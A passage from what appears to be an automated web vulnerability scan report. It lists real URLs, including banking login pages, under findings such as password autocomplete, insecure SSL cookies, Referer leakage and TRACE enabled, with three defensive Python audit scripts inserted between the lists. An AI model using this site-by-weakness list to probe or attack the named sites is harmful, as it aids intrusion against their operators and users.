11.229. http://www.observer.com/

11.230. http://www.othersonline.com/partner/scripts/myyearbook/alice.js

11.231. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js

11.232. http://www.righthealth.com/contextlinks/lifescript.com/cl.js

11.233. http://www.righthealth.com/external/ads/clo.gif

11.234. http://www.silverlight.net/getting-started

11.235. http://www.socialirl.com/storage/Social-IRL-Logofor-Squares.gif

11.236. http://www.uscg.mil/global/img/primary_uscg.jpg

11.237. http://www.walmartlabs.com/

11.238. http://www.wtp101.com/pull_sync

12. Password field with autocomplete enabled

12.1. https://acn-members.apple.com/mo_login/login.lasso

12.2. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

12.3. http://forums.vostu.com/

12.4. http://forums.vostu.com/forums/41-Como-Jogar

12.5. http://static.curse.com/themes/common/v6/scripts/core.js

12.6. https://towernet.capitalonebank.com/loginpage.html

12.7. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

12.8. https://www.google.com/accounts/ServiceLogin
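The "password field with autocomplete enabled" finding above is a static check on the HTML: a `<input type="password">` whose own tag, and whose enclosing `<form>`, lack `autocomplete="off"`. The checker below is an added example written for this page; it is not part of the XSS.CX report or of any listed site, and the HTML it scans is constructed here rather than captured from any of the URLs above.

```python
from html.parser import HTMLParser

# Constructed sample page (not fetched from any site in the report).
# Form 1: password field with no autocomplete control  -> reported.
# Form 2: autocomplete="off" on the <form>               -> not reported.
# Form 3: autocomplete="off" on the <input> itself       -> not reported.
SAMPLE_HTML = """<html><body>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="passwd">
</form>
<form action="/login2" autocomplete="off">
  <input type="PASSWORD" name="pw2">
</form>
<form action="/login3">
  <input type="password" name="pw3" autocomplete="off" />
</form>
</body></html>
"""


class PasswordAutocompleteAuditor(HTMLParser):
    """Collect password inputs that neither they nor their <form> mark autocomplete=off.

    Tag and attribute names arrive lower-cased from HTMLParser; attribute
    values are lower-cased here so TYPE="Password" / autocomplete="OFF" match.
    Self-closing <input ... /> tags are routed to handle_starttag by the base
    class's default handle_startendtag, so they are covered too.
    """

    def __init__(self):
        super().__init__()
        self.form_autocomplete_off = False
        self.findings = []  # (line number, field name or id)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # bare attrs have v=None
        if tag == "form":
            self.form_autocomplete_off = a.get("autocomplete", "").lower() == "off"
        elif tag == "input" and a.get("type", "").lower() == "password":
            field_off = a.get("autocomplete", "").lower() == "off"
            if not (field_off or self.form_autocomplete_off):
                line, _ = self.getpos()
                self.findings.append((line, a.get("name") or a.get("id") or "?"))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_autocomplete_off = False  # scope ends with the form


def audit_password_fields(html):
    """Return [(line, field), ...] for password inputs that allow autocompletion."""
    parser = PasswordAutocompleteAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for line, field in audit_password_fields(SAMPLE_HTML):
        print(f"line {line}: password field '{field}' allows autocomplete")
```

Caveat when triaging this class of finding: current mainstream browsers deliberately ignore `autocomplete="off"` on login fields when offering to save or fill passwords, so the attribute no longer delivers the protection the check assumes; treat the finding as informational unless a specific deployed browser is known to honour it.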

13. Source code disclosure

13.1. http://a.fsdn.com/con/js/min/sf.js

13.2. http://cache.boston.com/universal/js/underscore-min-1.1.6.js

13.3. http://cache.boston.com/universal/newsprojects/widgets/slider/slider.js

13.4. http://consultants-locator.apple.com/javascript/portal.1309219793.js

13.5. http://i1.social.s-msft.com/Search/scriptloader.js

13.6. http://secure.adnxs.com/seg

13.7. http://www.lifescript.com/JavaScript/Tracking/EfficientFrontier.js

13.8. http://www.microsoft.com/en-us/security_essentials/shared/templates/components/oneMscomBlade/oneMscomBlade.css

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://lifescript.us.intellitxt.com/intellitxt/front.asp

15.2. http://www.facebook.com/plugins/like.php

15.3. http://www.facebook.com/plugins/likebox.php

16. Cross-domain POST

16.1. http://corp.klout.com/contact

16.2. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

16.3. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

16.4. http://www.treehugger.com/daylife/related/72065.html

16.5. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

16.6. http://www.treehugger.com/galleries/

16.7. http://www.treehugger.com/science_technology/

16.8. http://www.treehugger.com/travel_nature/

17. SSL cookie without secure flag set

17.1. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

17.2. https://servicing.capitalone.com/c1/login.aspx
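The "SSL cookie without secure flag set" finding above means an HTTPS response issued a cookie whose Set-Cookie header carries no `Secure` attribute, so a browser will also send that cookie on any plain-HTTP request to the same host. The audit below is an added example for this page, not code from the XSS.CX report or from any listed site; the responses it checks are constructed inline, and the hostnames are placeholders rather than the banking URLs listed above.

```python
from urllib.parse import urlsplit

# Constructed sample responses (not captured from any site in the report):
# response URL -> the Set-Cookie header values that response carried.
SAMPLE_RESPONSES = {
    "https://bank.example.test/login.aspx": [
        "ASP.NET_SessionId=abc123; path=/; HttpOnly",   # no Secure -> reported
        "pref=en; path=/; Secure; HttpOnly",            # fine
        "csrf=xyz; Path=/; SECURE",                     # attribute names are case-insensitive
    ],
    "http://www.example.test/": [
        "tracker=1; path=/",                            # plain HTTP: out of scope for this finding
    ],
}


def parse_set_cookie(header):
    """Split one Set-Cookie header value into (cookie name, {attribute: value}).

    Attribute names are lower-cased so Secure/secure/SECURE all match, and
    flag attributes with no '=' (Secure, HttpOnly) get an empty-string value.
    """
    pieces = [p.strip() for p in header.split(";")]
    name = pieces[0].partition("=")[0].strip()
    attrs = {}
    for piece in pieces[1:]:
        if piece:
            key, _, value = piece.partition("=")
            attrs[key.strip().lower()] = value.strip()
    return name, attrs


def cookies_missing_secure(url, set_cookie_headers):
    """Names of cookies issued in an HTTPS response without the Secure attribute.

    Cookies set over plain HTTP are skipped: the finding is specifically about
    cookies that were issued over TLS and can still leak onto an HTTP request.
    """
    if urlsplit(url).scheme.lower() != "https":
        return []
    return [name for name, attrs in map(parse_set_cookie, set_cookie_headers)
            if "secure" not in attrs]


def audit(responses):
    """Map each offending HTTPS URL to its cookie names; clean URLs are omitted."""
    findings = {}
    for url, headers in responses.items():
        missing = cookies_missing_secure(url, headers)
        if missing:
            findings[url] = missing
    return findings


if __name__ == "__main__":
    for url, names in audit(SAMPLE_RESPONSES).items():
        print(f"{url}: cookie(s) issued without Secure flag: {', '.join(names)}")
```

Each Set-Cookie header must be passed separately; folding several into one comma-joined string breaks the parse because `Expires` values legitimately contain commas.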

18. Cross-domain Referer leakage

18.1. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911

18.2. http://a.fsdn.com/con/css/sf.min.css

18.3. http://a.fsdn.com/con/js/min/sf.js

18.4. http://a.netmng.com/hic/

18.5. http://a.netmng.com/hic/

18.6. http://a.rad.msn.com/ADSAdClient31.dll

18.7. http://a.rad.msn.com/ADSAdClient31.dll

18.8. http://a.rad.msn.com/ADSAdClient31.dll

18.9. http://a.tribalfusion.com/j.ad

18.10. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3

18.11. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225

18.12. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2

18.13. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

18.14. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

18.15. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

18.16. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

18.17. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

18.18. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

18.19. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

18.20. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

18.21. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel

18.22. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.24. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

18.26. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18

18.27. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911

18.28. http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911

18.29. http://ad.doubleclick.net/adj/interactive.wsj.com/markets_story

18.30. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions

18.31. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr

18.32. http://ad.doubleclick.net/adj/lqm.codeplex.site/C-rawr

18.33. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text

18.34. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec

18.35. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.36. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.37. http://ad.doubleclick.net/adj/scmag.hmktus/sc

18.38. http://ad.yieldmanager.com/pixel

18.39. http://ads.pointroll.com/PortalServe/

18.40. http://ads.pointroll.com/PortalServe/

18.41. http://ads.pointroll.com/PortalServe/

18.42. http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH

18.43. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

18.44. http://assets.mybcdna.com/JavaScript/apps/site.js

18.45. http://assets.tumblr.com/iframe.html

18.46. http://bs.serving-sys.com/BurstingPipe/adServer.bs

18.47. http://cm.g.doubleclick.net/pixel

18.48. http://cm.g.doubleclick.net/pixel

18.49. http://cm.g.doubleclick.net/pixel

18.50. https://code.google.com/p/domsnitch/downloads/detail

18.51. http://consultants-locator.apple.com/index.php

18.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.53. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.54. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.55. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.57. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.58. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.59. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.60. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.61. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer

18.62. http://d.101m3.com/afr.php

18.63. http://d.101m3.com/afr.php

18.64. http://d.101m3.com/afr.php

18.65. http://dg.specificclick.net/

18.66. http://dinclinx.com/

18.67. http://googleads.g.doubleclick.net/pagead/ads

18.68. http://googleads.g.doubleclick.net/pagead/ads

18.69. http://googleads.g.doubleclick.net/pagead/ads

18.70. http://googleads.g.doubleclick.net/pagead/ads

18.71. http://googleads.g.doubleclick.net/pagead/ads

18.72. http://googleads.g.doubleclick.net/pagead/ads

18.73. http://googleads.g.doubleclick.net/pagead/ads

18.74. http://googleads.g.doubleclick.net/pagead/ads

18.75. http://googleads.g.doubleclick.net/pagead/ads

18.76. http://googleads.g.doubleclick.net/pagead/ads

18.77. http://googleads.g.doubleclick.net/pagead/ads

18.78. http://googleads.g.doubleclick.net/pagead/ads

18.79. http://greatponds.squarespace.com/universal/scripts/global.js

18.80. http://hipservice.live.com/gethip.srf

18.81. http://home.live.com/search

18.82. http://home.live.com/search/hip

18.83. http://ib.adnxs.com/if

18.84. http://ib.adnxs.com/ptj

18.85. http://ib.adnxs.com/ptj

18.86. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js

18.87. http://maps.google.com/maps

18.88. http://media.fastclick.net/w/get.media

18.89. http://mediacdn.disqus.com/1311185431/build/system/disqus.js

18.90. http://mediacdn.disqus.com/1311376479/build/system/disqus.js

18.91. http://my.seashepherd.org/NetCommunity/Page.aspx

18.92. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

18.93. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx

18.94. http://pixel.everesttech.net/2368/gr

18.95. http://pixel.invitemedia.com/admeld_sync

18.96. http://platform0.twitter.com/widgets/follow_button.html

18.97. http://player.vimeo.com/video/18305022

18.98. http://player.vimeo.com/video/25752549

18.99. http://player.vimeo.com/video/26341323

18.100. http://player.vimeo.com/video/8022406

18.101. http://rad.msn.com/ADSAdClient31.dll

18.102. http://rad.msn.com/ADSAdClient31.dll

18.103. http://rad.msn.com/ADSAdClient31.dll

18.104. http://rad.msn.com/ADSAdClient31.dll

18.105. http://rad.msn.com/ADSAdClient31.dll

18.106. http://rad.msn.com/ADSAdClient31.dll

18.107. http://rad.msn.com/ADSAdClient31.dll

18.108. http://rad.msn.com/ADSAdClient31.dll

18.109. http://rad.msn.com/ADSAdClient31.dll

18.110. http://rad.msn.com/ADSAdClient31.dll

18.111. http://rad.msn.com/ADSAdClient31.dll

18.112. http://rd.apmebf.com/w/get.media

18.113. http://scmagazineus.disqus.com/combination_widget.js

18.114. http://showadsak.pubmatic.com/AdServer/AdServerServlet

18.115. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

18.116. http://social.msdn.microsoft.com/Search/en-US

18.117. http://social.msdn.microsoft.com/Search/en-US

18.118. http://social.msdn.microsoft.com/Search/en-US

18.119. http://social.msdn.microsoft.com/Search/en-US/en-USebb6e

18.120. http://social.msdn.microsoft.com/search/en-US

18.121. http://static.curse.com/themes/common/v6/scripts/core.js

18.122. http://syndication.jobthread.com/jt/syndication/page.php

18.123. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

18.124. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

18.125. http://visualstudiogallery.msdn.microsoft.com/site/search

18.126. http://visualstudiogallery.msdn.microsoft.com/site/search

18.127. http://widgets.klout.com/

18.128. http://www.bing.com/search

18.129. http://www.boston.com/dynamicassembly/sitepath54/js_output.js

18.130. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

18.131. http://www.capitalone.com/directbanking/

18.132. http://www.datacard.com/combined.js

18.133. http://www.facebook.com/connect/connect.php

18.134. http://www.facebook.com/connect/connect.php

18.135. http://www.facebook.com/connect/connect.php

18.136. http://www.facebook.com/connect/connect.php

18.137. http://www.facebook.com/plugins/comments.php

18.138. http://www.facebook.com/plugins/comments.php

18.139. http://www.facebook.com/plugins/comments.php

18.140. http://www.facebook.com/plugins/comments.php

18.141. http://www.facebook.com/plugins/comments.php

18.142. http://www.facebook.com/plugins/comments.php

18.143. http://www.facebook.com/plugins/comments.php

18.144. http://www.facebook.com/plugins/comments.php

18.145. http://www.facebook.com/plugins/comments.php

18.146. http://www.facebook.com/plugins/comments.php

18.147. http://www.facebook.com/plugins/comments.php

18.148. http://www.facebook.com/plugins/comments.php

18.149. http://www.facebook.com/plugins/comments.php

18.150. http://www.facebook.com/plugins/comments.php

18.151. http://www.facebook.com/plugins/comments.php

18.152. http://www.facebook.com/plugins/comments.php

18.153. http://www.facebook.com/plugins/comments.php

18.154. http://www.facebook.com/plugins/comments.php

18.155. http://www.facebook.com/plugins/comments.php

18.156. http://www.facebook.com/plugins/comments.php

18.157. http://www.facebook.com/plugins/comments.php

18.158. http://www.facebook.com/plugins/comments.php

18.159. http://www.facebook.com/plugins/comments.php

18.160. http://www.facebook.com/plugins/comments.php

18.161. http://www.facebook.com/plugins/fan.php

18.162. http://www.facebook.com/plugins/like.php

18.163. http://www.facebook.com/plugins/likebox.php

18.164. http://www.facebook.com/plugins/likebox.php

18.165. http://www.facebook.com/plugins/likebox.php

18.166. http://www.facebook.com/plugins/likebox.php

18.167. http://www.google.com/search

18.168. http://www.google.com/search

18.169. http://www.google.com/search

18.170. http://www.google.com/search

18.171. http://www.google.com/search

18.172. http://www.google.com/url

18.173. http://www.google.com/url

18.174. http://www.google.com/url

18.175. http://www.greatpondsma.org/universal/scripts/global.js

18.176. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

18.177. http://www.lifescript.com/adcontrol.htm

18.178. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx

18.179. http://www.microsoft.com/en-us/homepage/Components/Grid/Home.asch

18.180. http://www.microsoft.com/en-us/homepage/Components/Grid/Work-Business.asch

18.181. http://www.microsoft.com/en-us/security_essentials/Search.aspx

18.182. http://www.microsoft.com/en-us/security_essentials/default.aspx

18.183. http://www.myyearbook.com/advertising/default.php

18.184. http://www.nmmlaw.com/index.php

18.185. http://www.paloaltonetworks.com/cam/switch/index.php

18.186. http://www.scmagazineus.com/js/scripts.js

18.187. http://www.silverlight.net/silverlight-adchain.html

18.188. http://www.silverlight.net/silverlight-adchain.html

18.189. http://www.treehugger.com/galleries/

18.190. http://www.treehugger.com/science_technology/

18.191. http://www.treehugger.com/travel_nature/

18.192. http://www.youtube.com/embed/6hCRafyV0zI

18.193. http://www.youtube.com/embed/pDXWOjC-AlA

19. Cross-domain script include

19.1. http://a.fsdn.com/adops/google/rev2/afc/sf_google_afc.js

19.2. http://a.netmng.com/hic/

19.3. http://a.netmng.com/hic/

19.4. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

19.5. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

19.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

19.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

19.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

19.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

19.10. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

19.11. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile2.js

19.12. http://analytics.microsoft.com/Sync.html

19.13. http://analytics.msn.com/Include.html

19.14. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

19.15. http://assets.tumblr.com/iframe.html

19.16. http://betaworks.com/

19.17. http://c627028.r28.cf2.rackcdn.com/google28reddefaultsUSA728x90.html

19.18. http://c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html

19.19. http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html

19.20. https://code.google.com/p/domsnitch/downloads/detail

19.21. https://code.google.com/p/domsnitch/downloads/list

19.22. http://code.msdn.microsoft.com/

19.23. http://consultants-locator.apple.com/index.php

19.24. http://corp.klout.com/blog/

19.25. http://corp.klout.com/careers

19.26. http://corp.klout.com/contact

19.27. http://corp.klout.com/kscore

19.28. http://corp.klout.com/perks

19.29. http://corp.klout.com/press

19.30. http://corp.klout.com/privacy

19.31. http://corp.klout.com/terms

19.32. http://games.myyearbook.com/

19.33. http://games.myyearbook.com/landing/pool

19.34. http://geek.net/

19.35. http://go.ionearth.com/

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://home.live.com/search

19.39. http://home.live.com/search/hip

19.40. http://ib.adnxs.com/if

19.41. http://keepitfresh.frid.ge/

19.42. http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx

19.43. http://my.seashepherd.org/NetCommunity/Page.aspx

19.44. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

19.45. http://player.vimeo.com/video/18305022

19.46. http://player.vimeo.com/video/25752549

19.47. http://player.vimeo.com/video/26341323

19.48. http://player.vimeo.com/video/8022406

19.49. http://research.microsoft.com/en-us/

19.50. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

19.51. http://research.microsoft.com/en-us/events/fs2011/default.aspx

19.52. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx

19.53. http://s1.lqcdn.com/m.min.js

19.54. http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css

19.55. http://social.msdn.microsoft.com/Search/en-US

19.56. http://social.msdn.microsoft.com/search/en-US/en-USebb6e

19.57. http://sourceforge.net/projects/hoytllc-vcloud/

19.58. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

19.59. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

19.60. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/description

19.61. http://visualstudiogallery.msdn.microsoft.com/site/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/eula

19.62. http://visualstudiogallery.msdn.microsoft.com/site/search

19.63. http://widgets.klout.com/

19.64. http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

19.65. http://www.asp.net/ajax

19.66. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

19.67. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

19.68. http://www.dailymarkets.com/stock/2011/07/20/jack-henry-associates-to-offer-microsoft-productivity-software-via-subscription/

19.69. http://www.datacard.com/

19.70. http://www.facebook.com/connect/connect.php

19.71. http://www.facebook.com/connect/connect.php

19.72. http://www.facebook.com/plugins/comments.php

19.73. http://www.facebook.com/plugins/comments.php

19.74. http://www.facebook.com/plugins/fan.php

19.75. http://www.facebook.com/plugins/likebox.php

19.76. http://www.hitcon.org/hit2011/

19.77. http://www.hitcon.org/hit2011/download.html

19.78. http://www.jackhenry.com/

19.79. http://www.jackhenrybanking.com/

19.80. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

19.81. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

19.82. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

19.83. http://www.lifescript.com/adcontrol.htm

19.84. http://www.m86security.com/products/web_security/m86-web-filtering-reporting-suite.asp

19.85. http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx

19.86. http://www.microsoft.com/en-us/default.aspx

19.87. http://www.microsoft.com/en-us/security_essentials/Search.aspx

19.88. http://www.microsoft.com/en-us/security_essentials/Support.aspx

19.89. http://www.microsoft.com/en-us/security_essentials/default.aspx

19.90. http://www.myyearbook.com/advertising/default.php

19.91. http://www.nmmlaw.com/index.php

19.92. http://www.observer.com/

19.93. http://www.paloaltonetworks.com/cam/switch/index.php

19.94. http://www.scmagazineus.com/

19.95. http://www.seashepherd.org/

19.96. http://www.seashepherd.org/media/js/jquery.prettyPhoto.js

19.97. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

19.98. http://www.seashepherd.org/popups/mobile-signup-lightbox/

19.99. http://www.silverpop.com/

19.100. http://www.silverpop.com/demo/index.html

19.101. http://www.silverpop.com/marketing-resources/index.html

19.102. http://www.silverpop.com/tweets.html

19.103. http://www.treehugger.com/daylife/related/72065.html

19.104. http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

19.105. http://www.treehugger.com/galleries/

19.106. http://www.treehugger.com/science_technology/

19.107. http://www.treehugger.com/travel_nature/

19.108. http://www.uscgnews.com/go/doc/786/1135035/

19.109. http://www.youtube.com/embed/6hCRafyV0zI

19.110. http://www.youtube.com/embed/pDXWOjC-AlA

19.111. http://www.youtube.com/embed/terD85scv4w

20. File upload functionality

20.1. http://a.fsdn.com/con/js/min/sf.js

20.2. http://mediacdn.disqus.com/1311382870/build/system/upload.html

20.3. http://sourceforge.net/projects/hoytllc-vcloud/

21. TRACE method is enabled

21.1. http://cheetah.vizu.com/

21.2. http://forums-test.vostu.com/

21.3. http://forums.vostu.com/

21.4. http://mm.chitika.net/

21.5. http://pixel.everesttech.net/

21.6. http://pixel1350.everesttech.net/

21.7. http://puma.vizu.com/

21.8. http://web2.checkm8.com/

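The "TRACE method is enabled" entries above are generated by sending a TRACE request and seeing it echoed back. The check below is an added example written for this page (not part of the original report or of the scanner that produced it): the sample replies, the host `example.invalid` and the marker cookie are constructed, and `probe_trace` is only for a live run against a host you are authorised to test. The security-relevant part is `leaked_headers`: a TRACE echo that reflects `Cookie` or `Authorization` is what made cross-site tracing (XST) an issue, although browsers have long refused to issue TRACE from script, so today the finding is mostly a hardening item rather than an exploitable one.

```python
"""Judge whether an HTTP TRACE reply shows the method enabled (XST check)."""
import http.client
from typing import Dict, List, Tuple

# Constructed sample replies for offline use (not captured from any host in
# the report): one server echoes the request back, one rejects it with 405.
ENABLED_REPLY = (
    200,
    {"Content-Type": "message/http"},
    "TRACE / HTTP/1.1\r\nHost: example.invalid\r\nCookie: session=abc123\r\n\r\n",
)
DISABLED_REPLY = (405, {"Allow": "GET, HEAD, POST"}, "Method Not Allowed")


def trace_enabled(status: int, headers: Dict[str, str], body: str,
                  marker: str = "Cookie: session=abc123") -> bool:
    """TRACE counts as enabled only if the server echoes the request back.

    A 200 status alone is not enough: some servers answer 200 with an error
    page for any method.  Require the message/http content type or the
    literal marker header we sent to appear in the body.
    """
    if status != 200:
        return False
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    return ctype.lower().startswith("message/http") or marker in body


def leaked_headers(body: str,
                   sensitive: Tuple[str, ...] = ("cookie", "authorization")) -> List[str]:
    """Names of sensitive request headers reflected in a TRACE echo body."""
    found = []
    for line in body.split("\r\n"):
        name, sep, _ = line.partition(":")
        if sep and name.strip().lower() in sensitive:
            found.append(name.strip())
    return found


def probe_trace(host: str, path: str = "/",
                timeout: float = 5.0) -> Tuple[int, Dict[str, str], str]:
    """Live probe (needs network): send TRACE with a marker cookie, return the reply."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("TRACE", path, headers={"Cookie": "session=abc123"})
    resp = conn.getresponse()
    body = resp.read().decode("latin-1", "replace")
    headers = dict(resp.getheaders())
    conn.close()
    return resp.status, headers, body


if __name__ == "__main__":
    for label, reply in (("enabled", ENABLED_REPLY), ("disabled", DISABLED_REPLY)):
        print(label, trace_enabled(*reply), leaked_headers(reply[2]))
```

On Apache the fix is `TraceEnable off`; on other servers, deny the method at the front-end proxy. Re-run the probe after the change and expect a 405 (or 501) rather than an echo.
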
22. Email addresses disclosed

22.1. http://ads1.msn.com/library/dap.js

22.2. http://betaworks.com/

22.3. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

22.4. http://clients.mobilecause.com/lists/1227/subscriptions/web.js

22.5. https://code.google.com/p/domsnitch/downloads/detail

22.6. http://code.msdn.microsoft.com/

22.7. http://consultants-locator.apple.com/javascript/yui/accordionview.js

22.8. http://consultants.apple.com/jquery.innerfade.js

22.9. http://corp.klout.com/blog/

22.10. http://corp.klout.com/blog/wp-content/themes/klout/blog.css

22.11. http://corp.klout.com/press

22.12. http://corp.klout.com/privacy

22.13. http://forums.vostu.com/

22.14. http://frid.ge/scripts/fridge-combined.1311259715.js

22.15. http://i1.asp.net/umbraco-script/msc_all.js

22.16. http://i1.code.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

22.17. http://i1.codeplex.com/scripts/v17950/i7/ScriptLoader.ashx

22.18. http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js

22.19. http://i1.visualstudiogallery.msdn.s-msft.com/GlobalResources/Scripts/omni_rsid_msdn_current_wedcs2_min.js

22.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

22.21. http://i2.msdn.microsoft.com/Platform/Controls/Omniture/resources/MSDN/omni_rsid_msdn-bn20110713.js

22.22. http://i2.silverlight.net/scripts/omniture.js

22.23. http://images.apple.com/global/scripts/lib/event_mixins.js

22.24. http://images.apple.com/global/scripts/lib/scriptaculous.js

22.25. http://js.wlxrs.com/~Live.SiteContent.ID/~16.1.11/~/~/~/~/js/Main_WLStrings_JS1033.js

22.26. http://keepitfresh.frid.ge/

22.27. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/357c/maps2/%7Bmod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw,mod_mg%7D.js

22.28. http://mediacdn.disqus.com/1311185431/build/system/disqus.js

22.29. http://mediacdn.disqus.com/1311376479/build/system/disqus.js

22.30. https://onlinebanking.capitalone.com/CapitalOne/Enrollment.aspx

22.31. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js

22.32. http://sj.wsj.net/djscript/require/j_global_slim/version/20110721222540.js

22.33. http://storeimages.apple.com/1867/store.apple.com/rs/js/store/release/apple.js

22.34. http://widgets.twimg.com/j/2/widget.js

22.35. http://www.articleonepartners.com/sidebar-modules/get_blog_json.php

22.36. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

22.37. http://www.capitalone.com/contactus/index.php

22.38. http://www.capitalone.com/css/footer.css

